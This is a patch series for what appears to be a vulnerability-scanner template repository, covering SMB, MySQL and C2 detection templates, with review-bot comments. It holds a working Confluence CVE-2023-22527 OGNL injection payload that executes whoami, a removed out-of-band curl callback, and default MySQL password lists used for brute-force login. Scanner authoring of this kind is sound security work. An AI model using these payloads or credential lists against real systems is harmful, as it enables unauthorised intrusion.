+++ b/javascript/network/smb/smb2-server-time.yaml @@ -0,0 +1,38 @@ +id: smb2-server-time + +info: + name: SMB2 Server Time - Detection + author: DhiyaneshDK + severity: info + description: | + Trying to retrieve the present date of the system along with the initiation date of an SMB2 server. + reference: + - https://nmap.org/nsedoc/scripts/smb2-time.html + metadata: + shodan-query: "port:445" + verified: true + tags: js,network,smb,enum + +javascript: + - code: | + var m = require("nuclei/smb"); + var c = m.SMBClient(); + var response = c.ConnectSMBInfoMode(Host,Port); + var systemTime = new Date(response.NegotiationLog.SystemTime * 1000).toISOString(); + var serverstartTime = new Date(response.NegotiationLog.ServerStartTime * 1000).toISOString(); + var result = "SystemTime: " + systemTime + " ServerStartTime: " + serverstartTime; + result + + args: + Host: "{{Host}}" + Port: "445" + + matchers: + - type: dsl + dsl: + - success + + extractors: + - type: dsl + dsl: + - response diff --git a/ssl/c2/venomrat.yaml b/ssl/c2/venomrat.yaml new file mode 100644 index 0000000000..cb8bfbcf42 --- /dev/null +++ b/ssl/c2/venomrat.yaml @@ -0,0 +1,26 @@ +id: venomrat + +info: + name: VenomRAT - Detect + author: pussycat0x + severity: info + reference: + - https://twitter.com/v0lundr_/status/1727277517659353297 + metadata: + verified: "true" + max-request: 1 + fofa-query: cert.issuer.cn="VenomRAT Server" + tags: c2,ir,osint,malware,ssl,venomrat + +ssl: + - address: "{{Host}}:{{Port}}" + matchers: + - type: word + part: issuer_cn + words: + - "VenomRAT Server" + + extractors: + - type: json + json: + - ".issuer_cn" From ded264e153f06a31dc89cdca1ebda10155f20474 Mon Sep 17 00:00:00 2001 
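Review bot: `new Date(response.NegotiationLog.SystemTime * 1000).toISOString()` throws a TypeError if `NegotiationLog` is absent and a RangeError from `toISOString` if `SystemTime` is missing, so a host that negotiates SMB but returns no timing data fails the template rather than producing no match; guard with `if (!response || !response.NegotiationLog) { ""; } else { ... }` or check both fields before formatting. The `* 1000` assumes the fields are Unix seconds, which the hunk does not show; a comment stating that assumption would help. `serverstartTime` is inconsistently cased next to `systemTime`.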
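Review bot: `verified: "true"` is a quoted string while every other template in this patch writes the boolean `verified: true`; tooling that reads the flag as a boolean will not treat the string as equivalent, so use `verified: true`. The `fofa-query` value `cert.issuer.cn="VenomRAT Server"` is an unquoted plain scalar containing double quotes; it parses, but quoting it as `fofa-query: 'cert.issuer.cn="VenomRAT Server"'` protects it from future edits. The template lacks a `description`; one line stating that the match is on the certificate issuer CN would document what a hit means.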
From: Dhiyaneshwaran Date: Sat, 9 Mar 2024 21:25:30 +0530 Subject: [PATCH 02/13] duplicate template --- http/cves/2023/CVE-2023-22527.yaml | 37 ++++++++++++++---------- http/cves/2023/CVE-2023-6895.yaml | 5 ++-- http/cves/2023/CVE-2024-21893.yaml | 45 ------------------------------ 3 files changed, 26 insertions(+), 61 deletions(-) delete mode 100644 http/cves/2023/CVE-2024-21893.yaml diff --git a/http/cves/2023/CVE-2023-22527.yaml b/http/cves/2023/CVE-2023-22527.yaml index bcce43b020..d7d025c7bf 100644 --- a/http/cves/2023/CVE-2023-22527.yaml +++ b/http/cves/2023/CVE-2023-22527.yaml 
@@ -1,21 +1,29 @@ id: CVE-2023-22527 info: - name: Atlassian Confluence Unauthenticted Remote Code Execution + name: Atlassian Confluence - Remote Code Execution author: iamnooob,rootxharsh,pdresearch severity: critical - description: |- - A template injection vulnerability on older versions of Confluence Data Center and Server allows an unauthenticated attacker to achieve RCE on an affected instance. Customers using an affected version must take immediate action. Most recent supported versions of Confluence Data Center and Server are not affected by this vulnerability as it was ultimately mitigated during regular version updates. However, Atlassian recommends that customers take care to install the latest version to protect their instances from non-critical vulnerabilities outlined in Atlassian’s January Security Bulletin. + description: | + A template injection vulnerability on older versions of Confluence Data Center and Server allows an unauthenticated attacker to achieve RCE on an affected instance. Customers using an affected version must take immediate action. + Most recent supported versions of Confluence Data Center and Server are not affected by this vulnerability as it was ultimately mitigated during regular version updates. However, Atlassian recommends that customers take care to install the latest version to protect their instances from non-critical vulnerabilities outlined in Atlassian’s January Security Bulletin. 
reference: - https://confluence.atlassian.com/pages/viewpage.action?pageId=1333335615 - https://jira.atlassian.com/browse/CONFSERVER-93833 + - https://blog.projectdiscovery.io/atlassian-confluence-ssti-remote-code-execution/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cve-id: CVE-2023-22527 epss-score: 0.00044 - epss-percentile: 0.08185 - tags: cve,cve2023,confluence + epss-percentile: 0.08115 + cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: atlassian + product: confluence_data_center + shodan-query: http.component:"Atlassian Confluence" + tags: cve,cve2023,confluence,rce,ssti http: - raw: 
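Review bot: The new `cpe` and `product` metadata name only `confluence_data_center`, while the description and the vendor advisory cover both Confluence Data Center and Server; if the template is meant to apply to both, the metadata should say so, or a comment should note why only the Data Center CPE is listed. The added reference and the reformatted `description` block read fine. The `http:`/`raw:` lines at the end of this hunk continue in the next hunk.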
@@ -23,18 +31,19 @@ http: POST /template/aui/text-inline.vm HTTP/1.1 Host: {{Hostname}} Accept-Encoding: gzip, deflate, br - Accept: */* Content-Type: application/x-www-form-urlencoded - Content-Length: 335 - label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=(new freemarker.template.utility.Execute()).exec({"curl {{interactsh-url}}"}) + label=aaa\u0027%2b#request.get(\u0027.KEY_velocity.struts2.context\u0027).internalGet(\u0027ognl\u0027).findValue(#parameters.poc[0],{})%2b\u0027&poc=@org.apache.struts2.ServletActionContext@getResponse().setHeader(\u0027x_vuln_check\u0027,(new+freemarker.template.utility.Execute()).exec({"whoami"})) - matchers-condition: and matchers: - - type: word - part: body - words: - - 'Empty{name=' - type: dsl dsl: - - "contains(interactsh_protocol, 'dns')" + - x_vuln_check != "" # check for custom header key exists + - contains(to_lower(body), 'empty{name=') + condition: and + + extractors: + - type: dsl + dsl: + - x_vuln_check # prints the output of whoami +# digest: 4b0a00483046022100cad74b2de250961c24ea16a5b8ed5cf9c1b4fa29b81cbfca33f3b72f5a4474c5022100c501f652babe15618734328d07936a3c399f964dfc0a67db2a8a61dd9e20a6ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6895.yaml b/http/cves/2023/CVE-2023-6895.yaml index ae97042eb3..69da102528 100644 --- a/http/cves/2023/CVE-2023-6895.yaml +++ b/http/cves/2023/CVE-2023-6895.yaml 
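Review bot: The check now executes `whoami` on the target and reads its output back through the `x_vuln_check` response header, replacing the out-of-band DNS confirmation; neither the `description` nor the `metadata` says so, and an operator scanning production systems should be able to tell from the template that it runs a command and leaves a marker header in the response. A sentence in the description such as `Verification executes whoami on the target and returns it in an x_vuln_check response header.` would document that. The file also ends with `\ No newline at end of file` after the `# digest:` line, which appears to be the template signature that the repository's signing tooling regenerates; confirm the digest was produced by the signer rather than edited by hand.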
@@ -2,9 +2,10 @@ id: CVE-2023-6895 info: name: Hikvision IP ping.php - Command Execution - author: DhiyaneshDk + author: DhiyaneshDk,archer severity: critical - description: A vulnerability was found in Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK). It has been declared as critical. This vulnerability affects unknown code of the file /php/ping.php. The manipulation of the argument jsondata[ip] with the input netstat -ano leads to os command injection. The exploit has been disclosed to the public and may be used. Upgrading to version 4.1.0 is able to address this issue. It is recommended to upgrade the affected component. VDB-248254 is the identifier assigned to this vulnerability. + description: | + A vulnerability was found in Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK). It has been declared as critical. This vulnerability affects unknown code of the file /php/ping.php. The manipulation of the argument jsondata[ip] with the input netstat -ano leads to os command injection. The exploit has been disclosed to the public and may be used. Upgrading to version 4.1.0 is able to address this issue. It is recommended to upgrade the affected component. VDB-248254 is the identifier assigned to this vulnerability. reference: - https://vuldb.com/?ctiid.248254 - https://vuldb.com/?id.248254 diff --git a/http/cves/2023/CVE-2024-21893.yaml b/http/cves/2023/CVE-2024-21893.yaml deleted file mode 100644 index d58f98dc69..0000000000 --- a/http/cves/2023/CVE-2024-21893.yaml +++ /dev/null 
@@ -1,45 +0,0 @@ -id: CVE-2024-21893 - -info: - name: Ivanti SAML - Server Side Request Forgery (SSRF) - author: DhiyaneshDk - severity: high - description: | - A server-side request forgery vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) and Ivanti Neurons for ZTA allows an attacker to access certain restricted resources without authentication. - reference: - - https://attackerkb.com/topics/FGlK1TVnB2/cve-2024-21893/rapid7-analysis - - https://www.assetnote.io/resources/research/ivantis-pulse-connect-secure-auth-bypass-round-two - - https://github.com/advisories/GHSA-5rr9-mqhj-7cr2 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N - cvss-score: 8.2 - cve-id: CVE-2024-21893 - cwe-id: CWE-918 - cpe: cpe:2.3:a:ivanti:connect_secure:9.0:-:*:*:*:*:*:* - metadata: - vendor: ivanti - product: connect_secure - shodan-query: "html:\"welcome.cgi?p=logo\"" - tags: cve,cve2024,kev,ssrf,ivanti - -http: - - raw: - - | - POST /dana-ws/saml20.ws HTTP/1.1 - Host: {{Hostname}} - - qwerty - - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol # Confirms the DNS Interaction - words: - - "dns" - - - type: word - part: body - words: - - '/dana-na/' - - 'WriteCSS' - condition: and From 1a2e86eacbe936d3099ab21afb34d8dc01074299 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 9 Mar 2024 21:36:14 +0530 Subject: [PATCH 03/13] Added Helper for mysql --- helpers/wordlists/mysql-passwords.txt | 19 +++++++++++++++++++ helpers/wordlists/mysql-users.txt | 7 +++++++ 2 files changed, 26 insertions(+) create mode 100644 helpers/wordlists/mysql-passwords.txt create mode 100644 helpers/wordlists/mysql-users.txt diff --git a/helpers/wordlists/mysql-passwords.txt b/helpers/wordlists/mysql-passwords.txt new file mode 100644 index 0000000000..c514e405ad --- /dev/null +++ b/helpers/wordlists/mysql-passwords.txt 
@@ -0,0 +1,19 @@ +mysql +root +chippc +admin +nagiosxi +usbw +cloudera +moves +testpw +p@ck3tf3nc3 +medocheck123 +mktt +123 +amp109 +eLaStIx.asteriskuser.2oo7 +raspberry +openauditrootuserpassword +vagrant +123qweASD# \ No newline at end of file diff --git a/helpers/wordlists/mysql-users.txt b/helpers/wordlists/mysql-users.txt new file mode 100644 index 0000000000..37e33b4a7e --- /dev/null +++ b/helpers/wordlists/mysql-users.txt @@ -0,0 +1,7 @@ +root +admin +cloudera +moves +mcUser +dbuser +asteriskuser \ No newline at end of file From fecc2c6470306efdd50873ced237a3b08f00121d Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Sat, 9 Mar 2024 23:48:37 +0530 Subject: [PATCH 04/13] Update mysql-load-file.yaml --- javascript/audit/mysql/mysql-load-file.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/audit/mysql/mysql-load-file.yaml b/javascript/audit/mysql/mysql-load-file.yaml index 5fc8f03f36..b74fe517a2 100644 --- a/javascript/audit/mysql/mysql-load-file.yaml +++ b/javascript/audit/mysql/mysql-load-file.yaml @@ -32,8 +32,8 @@ javascript: payloads: usernames: helpers/wordlists/mysql-users.txt passwords: helpers/wordlists/mysql-passwords.txt - stop-at-first-match: true + stop-at-first-match: true matchers-condition: and matchers: - type: dsl From b8281c259864bc20d284079806878eaaf5f7347e Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Sun, 10 Mar 2024 00:02:19 +0530 Subject: [PATCH 05/13] minor - changes --- javascript/audit/mysql/mysql-load-file.yaml | 2 +- javascript/enumeration/smb/rsync/rsync-version.yaml | 2 +- javascript/enumeration/smb/smb-enum-domains.yaml | 2 +- javascript/enumeration/smb/smb-version-detect.yaml | 2 +- javascript/mysql/mysql-show-variables.yaml | 2 +- javascript/mysql/mysql-user-enum.yaml | 2 +- javascript/network/mysql/mysql-show-databases.yaml | 2 +- 7 files changed, 7 insertions(+), 7 deletions(-) 
diff --git a/javascript/audit/mysql/mysql-load-file.yaml b/javascript/audit/mysql/mysql-load-file.yaml index b74fe517a2..f4fed479ce 100644 --- a/javascript/audit/mysql/mysql-load-file.yaml +++ b/javascript/audit/mysql/mysql-load-file.yaml @@ -17,7 +17,7 @@ javascript: let m = require('nuclei/mysql'); let c = m.MySQLClient(); let response = c.ExecuteQuery(Host,Port,User,Pass,Query); - to_json(response); + Export(response); args: Host: "{{Host}}" diff --git a/javascript/enumeration/smb/rsync/rsync-version.yaml b/javascript/enumeration/smb/rsync/rsync-version.yaml index e986a8298d..e000224e17 100644 --- a/javascript/enumeration/smb/rsync/rsync-version.yaml +++ b/javascript/enumeration/smb/rsync/rsync-version.yaml @@ -17,7 +17,7 @@ javascript: let m = require('nuclei/rsync'); let c = m.RsyncClient(); let response = c.IsRsync(Host,Port); - to_json(response); + Export(response); args: Host: "{{Host}}" diff --git a/javascript/enumeration/smb/smb-enum-domains.yaml b/javascript/enumeration/smb/smb-enum-domains.yaml index b5c21ace5a..31290a3afe 100644 --- a/javascript/enumeration/smb/smb-enum-domains.yaml +++ b/javascript/enumeration/smb/smb-enum-domains.yaml @@ -19,7 +19,7 @@ javascript: var m = require("nuclei/smb"); var c = m.SMBClient(); var response = c.ListSMBv2Metadata(Host, Port); - to_json(response); + Export(response); args: Host: "{{Host}}" diff --git a/javascript/enumeration/smb/smb-version-detect.yaml b/javascript/enumeration/smb/smb-version-detect.yaml index a7ec579271..863822b030 100644 --- a/javascript/enumeration/smb/smb-version-detect.yaml +++ b/javascript/enumeration/smb/smb-version-detect.yaml @@ -15,7 +15,7 @@ javascript: let m = require("nuclei/smb"); let c = m.SMBClient(); let response = c.ConnectSMBInfoMode(Host, Port); - to_json(response); + Export(response); args: Host: "{{Host}}" diff --git a/javascript/mysql/mysql-show-variables.yaml b/javascript/mysql/mysql-show-variables.yaml index 778c32ec4a..6d3b05cbd1 100644 
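Review bot: Replacing `to_json(response)` with `Export(response)` changes what the extractors see: the `type: json` extractors in `mysql-show-variables`, `mysql-user-enum` and `mysql-show-databases` use `part: response` with jq paths, and whether `Export` exposes the object as a JSON string those extractors can parse is not visible in these hunks; confirm with a run against a live instance before merging, since the commit message `minor - changes` gives no indication it was tested. The same substitution appears in the `rsync-version`, `smb-enum-domains` and `smb-version-detect` hunks of this patch. Each enclosing `code` block continues outside its hunk.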
--- a/javascript/mysql/mysql-show-variables.yaml +++ b/javascript/mysql/mysql-show-variables.yaml @@ -16,7 +16,7 @@ javascript: let m = require('nuclei/mysql'); let c = m.MySQLClient(); let response = c.ExecuteQuery(Host,Port,User,Pass,Query); - log(to_json(response)); + Export(response); args: Host: "{{Host}}" diff --git a/javascript/mysql/mysql-user-enum.yaml b/javascript/mysql/mysql-user-enum.yaml index 4df366eea5..11e39ecd2b 100644 --- a/javascript/mysql/mysql-user-enum.yaml +++ b/javascript/mysql/mysql-user-enum.yaml @@ -18,7 +18,7 @@ javascript: let m = require('nuclei/mysql'); let c = m.MySQLClient(); let response = c.ExecuteQuery(Host,Port,User,Pass,Query); - to_json(response); + Export(response); args: Host: "{{Host}}" diff --git a/javascript/network/mysql/mysql-show-databases.yaml b/javascript/network/mysql/mysql-show-databases.yaml index 6df95d25fd..f45037c2d4 100644 --- a/javascript/network/mysql/mysql-show-databases.yaml +++ b/javascript/network/mysql/mysql-show-databases.yaml @@ -16,7 +16,7 @@ javascript: let m = require('nuclei/mysql'); let c = m.MySQLClient(); let response = c.ExecuteQuery(Host,Port,User,Pass,Query); - to_json(response); + Export(response); args: Host: "{{Host}}" From c1728652ce19e8ad631c2aefd5aa88479b1096d1 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Sun, 10 Mar 2024 21:44:07 +0530 Subject: [PATCH 06/13] struct - changes --- javascript/enumeration/{smb => }/pop3/pop3-capabilities-enum.yaml | 0 javascript/enumeration/{smb => }/rsync/rsync-version.yaml | 0 2 files changed, 0 insertions(+), 0 deletions(-) rename javascript/enumeration/{smb => }/pop3/pop3-capabilities-enum.yaml (100%) rename javascript/enumeration/{smb => }/rsync/rsync-version.yaml (100%) 
diff --git a/javascript/enumeration/smb/pop3/pop3-capabilities-enum.yaml b/javascript/enumeration/pop3/pop3-capabilities-enum.yaml similarity index 100% rename from javascript/enumeration/smb/pop3/pop3-capabilities-enum.yaml rename to javascript/enumeration/pop3/pop3-capabilities-enum.yaml diff --git a/javascript/enumeration/smb/rsync/rsync-version.yaml b/javascript/enumeration/rsync/rsync-version.yaml similarity index 100% rename from javascript/enumeration/smb/rsync/rsync-version.yaml rename to javascript/enumeration/rsync/rsync-version.yaml From 6b47f70c5cc9a28a994039a31bd74ee9eaf1567a Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 14 Mar 2024 15:42:01 +0530 Subject: [PATCH 07/13] SMB Version -FP fix --- javascript/enumeration/smb/smb-version-detect.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/javascript/enumeration/smb/smb-version-detect.yaml b/javascript/enumeration/smb/smb-version-detect.yaml index 863822b030..6ffa6c420d 100644 --- a/javascript/enumeration/smb/smb-version-detect.yaml +++ b/javascript/enumeration/smb/smb-version-detect.yaml @@ -17,6 +17,11 @@ javascript: let response = c.ConnectSMBInfoMode(Host, Port); Export(response); + matchers: + - type: dsl + dsl: + - "len(smb-version) != 0" + args: Host: "{{Host}}" Port: "445" From 07dd2d5c77d643b34f143d09328f6e307f53a236 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 14 Mar 2024 16:09:27 +0530 Subject: [PATCH 08/13] Update smb-version-detect.yaml --- javascript/enumeration/smb/smb-version-detect.yaml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/javascript/enumeration/smb/smb-version-detect.yaml b/javascript/enumeration/smb/smb-version-detect.yaml index 6ffa6c420d..a9dcd34e00 100644 --- a/javascript/enumeration/smb/smb-version-detect.yaml +++ b/javascript/enumeration/smb/smb-version-detect.yaml 
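Review bot: The new DSL `len(smb-version) != 0` uses an identifier containing a hyphen; in the expression language nuclei evaluates, `-` is the subtraction operator, so this is likely read as `smb - version` and fails rather than referencing the named extractor — confirm, and if so rename both the extractor and the reference to `smb_version`. The matcher also depends on the `smb-version` extractor having been evaluated first; if the engine runs extractors before matchers this is fine, otherwise the match is always empty. PATCH 08 moves the same block below `args` without changing the expression, so the point applies there too.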
@@ -17,15 +17,15 @@ javascript: let response = c.ConnectSMBInfoMode(Host, Port); Export(response); - matchers: - - type: dsl - dsl: - - "len(smb-version) != 0" - args: Host: "{{Host}}" Port: "445" + matchers: + - type: dsl + dsl: + - "len(smb-version) != 0" + extractors: - type: json name: smb-version From bd67746687456afe1a00ece676c01d8250a46b5e Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 14 Mar 2024 16:22:59 +0530 Subject: [PATCH 09/13] struct -update --- javascript/{ => enumeration}/mysql/mysql-db-enum.yaml | 0 javascript/{ => enumeration}/mysql/mysql-default-login.yaml | 0 .../{network => enumeration}/mysql/mysql-show-databases.yaml | 0 javascript/{ => enumeration}/mysql/mysql-show-variables.yaml | 0 javascript/{ => enumeration}/mysql/mysql-user-enum.yaml | 0 javascript/{network => enumeration}/redis/redis-info.yaml | 0 javascript/{network => enumeration}/redis/redis-require-auth.yaml | 0 javascript/{network => enumeration}/smb/smb2-server-time.yaml | 0 .../{network => misconfiguration}/mysql/mysql-empty-password.yaml | 0 9 files changed, 0 insertions(+), 0 deletions(-) rename javascript/{ => enumeration}/mysql/mysql-db-enum.yaml (100%) rename javascript/{ => enumeration}/mysql/mysql-default-login.yaml (100%) rename javascript/{network => enumeration}/mysql/mysql-show-databases.yaml (100%) rename javascript/{ => enumeration}/mysql/mysql-show-variables.yaml (100%) rename javascript/{ => enumeration}/mysql/mysql-user-enum.yaml (100%) rename javascript/{network => enumeration}/redis/redis-info.yaml (100%) rename javascript/{network => enumeration}/redis/redis-require-auth.yaml (100%) rename javascript/{network => enumeration}/smb/smb2-server-time.yaml (100%) rename javascript/{network => misconfiguration}/mysql/mysql-empty-password.yaml (100%) 
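Review bot: The relocated matcher `len(smb-version) != 0` references the extractor by a hyphenated name; if the DSL evaluator treats `-` as an operator, this reads as `smb - version` rather than a lookup of the `smb-version` extractor, so the match would silently never fire or error out. Renaming both sides to an underscore form, `name: smb_version` and `- "len(smb_version) != 0"`, removes the ambiguity; please verify against the engine's handling of hyphenated variable names before relying on it. The extractor's `json:` expression lies outside the hunk, so I cannot confirm what value the matcher actually sees.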
diff --git a/javascript/mysql/mysql-db-enum.yaml b/javascript/enumeration/mysql/mysql-db-enum.yaml similarity index 100% rename from javascript/mysql/mysql-db-enum.yaml rename to javascript/enumeration/mysql/mysql-db-enum.yaml diff --git a/javascript/mysql/mysql-default-login.yaml b/javascript/enumeration/mysql/mysql-default-login.yaml similarity index 100% rename from javascript/mysql/mysql-default-login.yaml rename to javascript/enumeration/mysql/mysql-default-login.yaml diff --git a/javascript/network/mysql/mysql-show-databases.yaml b/javascript/enumeration/mysql/mysql-show-databases.yaml similarity index 100% rename from javascript/network/mysql/mysql-show-databases.yaml rename to javascript/enumeration/mysql/mysql-show-databases.yaml diff --git a/javascript/mysql/mysql-show-variables.yaml b/javascript/enumeration/mysql/mysql-show-variables.yaml similarity index 100% rename from javascript/mysql/mysql-show-variables.yaml rename to javascript/enumeration/mysql/mysql-show-variables.yaml diff --git a/javascript/mysql/mysql-user-enum.yaml b/javascript/enumeration/mysql/mysql-user-enum.yaml similarity index 100% rename from javascript/mysql/mysql-user-enum.yaml rename to javascript/enumeration/mysql/mysql-user-enum.yaml diff --git a/javascript/network/redis/redis-info.yaml b/javascript/enumeration/redis/redis-info.yaml similarity index 100% rename from javascript/network/redis/redis-info.yaml rename to javascript/enumeration/redis/redis-info.yaml diff --git a/javascript/network/redis/redis-require-auth.yaml b/javascript/enumeration/redis/redis-require-auth.yaml similarity index 100% rename from javascript/network/redis/redis-require-auth.yaml rename to javascript/enumeration/redis/redis-require-auth.yaml diff --git a/javascript/network/smb/smb2-server-time.yaml b/javascript/enumeration/smb/smb2-server-time.yaml similarity index 100% rename from javascript/network/smb/smb2-server-time.yaml rename to javascript/enumeration/smb/smb2-server-time.yaml 
diff --git a/javascript/network/mysql/mysql-empty-password.yaml b/javascript/misconfiguration/mysql/mysql-empty-password.yaml similarity index 100% rename from javascript/network/mysql/mysql-empty-password.yaml rename to javascript/misconfiguration/mysql/mysql-empty-password.yaml From a2233701908186e5394aaf402a0bca6238d67ccf Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 15 Mar 2024 11:48:12 +0530 Subject: [PATCH 10/13] minor changes --- javascript/enumeration/smb/smb-default-creds.yaml | 2 +- javascript/enumeration/smb/smb-enum-domains.yaml | 2 +- javascript/enumeration/smb/smb-os-detect.yaml | 2 +- javascript/enumeration/smb/smb-version-detect.yaml | 2 +- 4 files changed, 4 insertions(+), 4 deletions(-) diff --git a/javascript/enumeration/smb/smb-default-creds.yaml b/javascript/enumeration/smb/smb-default-creds.yaml index 3a33b9ab79..325a599d14 100644 --- a/javascript/enumeration/smb/smb-default-creds.yaml +++ b/javascript/enumeration/smb/smb-default-creds.yaml @@ -16,7 +16,7 @@ info: javascript: - code: | var m = require("nuclei/smb"); - var c = m.SMBClient(); + var c = new m.SMBClient(); var response = c.ListShares(Host, Port, User, Pass); response; diff --git a/javascript/enumeration/smb/smb-enum-domains.yaml b/javascript/enumeration/smb/smb-enum-domains.yaml index 31290a3afe..39c928c9f5 100644 --- a/javascript/enumeration/smb/smb-enum-domains.yaml +++ b/javascript/enumeration/smb/smb-enum-domains.yaml @@ -17,7 +17,7 @@ info: javascript: - code: | var m = require("nuclei/smb"); - var c = m.SMBClient(); + var c = new m.SMBClient(); var response = c.ListSMBv2Metadata(Host, Port); Export(response); diff --git a/javascript/enumeration/smb/smb-os-detect.yaml b/javascript/enumeration/smb/smb-os-detect.yaml index 180b7cdd54..deb6aa604f 100644 --- a/javascript/enumeration/smb/smb-os-detect.yaml +++ b/javascript/enumeration/smb/smb-os-detect.yaml 
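Review bot: In smb-default-creds the script still ends with a bare `response;` expression while the sibling templates touched by this commit (smb-enum-domains, smb-version-detect) hand the result to `Export(response);`; leaving one file on the older implicit-return form may expose the result to matchers differently, and a reader of the four diffs cannot tell whether the difference is intended. Changing the last line to `Export(response);` keeps all four SMB templates on the same convention. The matcher section that consumes the value is outside the hunk.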
@@ -15,7 +15,7 @@ info: javascript: - code: | var m = require("nuclei/smb"); - var c = m.SMBClient(); + var c = new m.SMBClient(); var response = c.ListSMBv2Metadata(Host, Port); if (response.OSVersion === "6.3.9600") { osInfo = "Windows 8.1"; diff --git a/javascript/enumeration/smb/smb-version-detect.yaml b/javascript/enumeration/smb/smb-version-detect.yaml index a9dcd34e00..6bd0d74f77 100644 --- a/javascript/enumeration/smb/smb-version-detect.yaml +++ b/javascript/enumeration/smb/smb-version-detect.yaml @@ -13,7 +13,7 @@ info: javascript: - code: | let m = require("nuclei/smb"); - let c = m.SMBClient(); + let c = new m.SMBClient(); let response = c.ConnectSMBInfoMode(Host, Port); Export(response); From f31b32622b15ab68af4e41e2b9fd0745ce5ceb8f Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 22 Mar 2024 15:40:06 +0530 Subject: [PATCH 11/13] mysql -update --- javascript/audit/mysql/mysql-load-file.yaml | 22 +++++++--- .../enumeration/mysql/mysql-db-enum.yaml | 44 ------------------- javascript/enumeration/mysql/mysql-info.yaml | 36 +++++++++++++++ .../mysql/mysql-show-databases.yaml | 24 ++++++---- .../mysql/mysql-show-variables.yaml | 24 ++++++---- .../enumeration/mysql/mysql-user-enum.yaml | 24 ++++++---- 6 files changed, 99 insertions(+), 75 deletions(-) delete mode 100644 javascript/enumeration/mysql/mysql-db-enum.yaml create mode 100644 javascript/enumeration/mysql/mysql-info.yaml diff --git a/javascript/audit/mysql/mysql-load-file.yaml b/javascript/audit/mysql/mysql-load-file.yaml index f4fed479ce..5f61527c6e 100644 --- a/javascript/audit/mysql/mysql-load-file.yaml +++ b/javascript/audit/mysql/mysql-load-file.yaml @@ -10,7 +10,7 @@ info: metadata: shodan-query: port:3306 verified: true - tags: js,mysql,network,audit,fuzz + tags: js,mysql,network,audit javascript: - code: | 
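Review bot: `osInfo = "Windows 8.1";` in smb-os-detect assigns a variable that is never declared — the code block starts at `var m = ...` three lines earlier, so this creates an implicit global in sloppy mode and throws a ReferenceError if the embedded engine evaluates the snippet in strict mode. Declaring it once before the comparison chain, `var osInfo = "";`, also makes the fallback value explicit for versions that match no branch. The remainder of the if/else chain and whatever consumes `osInfo` are outside the hunk.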
@@ -26,12 +26,20 @@ javascript: User: "{{usernames}}" Pass: "{{passwords}}" - threads: 10 - attack: pitchfork - payloads: - usernames: helpers/wordlists/mysql-users.txt - passwords: helpers/wordlists/mysql-passwords.txt + usernames: + - anonymous + - root + - admin + - mysql + - nagiosxi + passwords: + - SqlServer0 + - root + - cloudera + - admin + - moves + attack: clusterbomb stop-at-first-match: true matchers-condition: and @@ -48,4 +56,4 @@ javascript: - type: json part: response json: - - .Rows[] + - .Rows[] \ No newline at end of file diff --git a/javascript/enumeration/mysql/mysql-db-enum.yaml b/javascript/enumeration/mysql/mysql-db-enum.yaml deleted file mode 100644 index 909ef0b518..0000000000 --- a/javascript/enumeration/mysql/mysql-db-enum.yaml +++ /dev/null @@ -1,44 +0,0 @@ -id: mysql-db-enum - -info: - name: MySQL Database - Enumeration - author: pussycat0x - severity: high - metadata: - shodan-query: port:3306 - tags: js,mssql,network,enum,fuzz - -javascript: - - code: | - let m = require('nuclei/mysql'); - let c = m.MySQLClient(); - let result = c.ConnectWithDB(Host,Port,User,Pass,dbName); - result; - - args: - Host: "{{Host}}" - Port: "3306" - dbName: "{{db}}" - User: "{{usernames}}" - Pass: "{{passwords}}" - - threads: 10 - attack: pitchfork - - stop-at-first-match: true - - payloads: - db: - - information_schema - - performance_schema - - mysql - - usernames: helpers/wordlists/mysql-users.txt - passwords: helpers/wordlists/mysql-passwords.txt - - matchers: - - type: dsl - dsl: - - "response == true" - - "success == true" - condition: and diff --git a/javascript/enumeration/mysql/mysql-info.yaml b/javascript/enumeration/mysql/mysql-info.yaml new file mode 100644 index 0000000000..5d90a8a098 --- /dev/null +++ b/javascript/enumeration/mysql/mysql-info.yaml 
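Review bot: The `@@ -48,4 +56,4 @@` hunk rewrites `- .Rows[]` only to drop the trailing newline (`\ No newline at end of file`), which produces a spurious diff on every later edit and fails yamllint's new-line-at-end-of-file check. The same commit does this to mysql-info, mysql-show-databases, mysql-show-variables and mysql-user-enum; restoring the final newline in all five files makes these hunks disappear. Separately, the `@@ -26,12 +26,20 @@` hunk replaces the wordlist references with an inline 5x5 `attack: clusterbomb` grid, i.e. 25 login combinations per host instead of pairwise pitchfork iteration; if that is intended, a short comment above `payloads:` noting the lockout/noise trade-off would stop the count from creeping upward silently in later edits.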
